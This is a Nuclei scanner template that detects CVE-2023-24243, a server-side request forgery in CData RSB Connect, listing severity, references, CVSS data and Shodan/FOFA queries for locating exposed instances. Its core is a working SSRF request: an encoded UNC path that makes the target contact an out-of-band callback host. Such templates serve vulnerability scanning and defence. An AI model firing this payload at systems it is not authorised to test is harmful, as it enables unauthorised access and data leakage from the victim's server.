id: CVE-2023-24243 info: name: CData RSB Connect v22.0.8336 - Server Side Request Forgery author: ritikchaddha severity: high description: | CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF). impact: | Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the server, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest security patches or updates provided by CData to fix the SSRF vulnerability in RSB Connect v22.0.8336. reference: - https://twitter.com/W01fh4cker/status/1669890019191037952 - https://gist.github.com/d3vc0r3/6460a5f006e32a2ebffe739e411ab1b8 - https://nvd.nist.gov/vuln/detail/CVE-2023-24243 - https://arc.cdata.com/ - https://arc.cdata.com/trial/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-24243 cwe-id: CWE-918 epss-score: 0.01019 epss-percentile: 0.83727 cpe: cpe:2.3:a:cdata:arc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cdata product: arc shodan-query: - http.favicon.hash:163538942 - http.favicon.hash:"163538942" fofa-query: icon_hash="163538942" tags: cve,cve2023,cdata,rsb,ssrf http: - method: GET path: - "{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb" matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: status status: - 404 # digest: 4b0a00483046022100b9ce44d92b9596d0ec6940ddf8e5e6fdc35b41d1df3039174a543212b8c8b4a5022100cefe0df1b2f3066f864f771121da6548ed9d59e695fe77e88ab58c7a191fe814:922c64590222798bb761d5b6d8e72950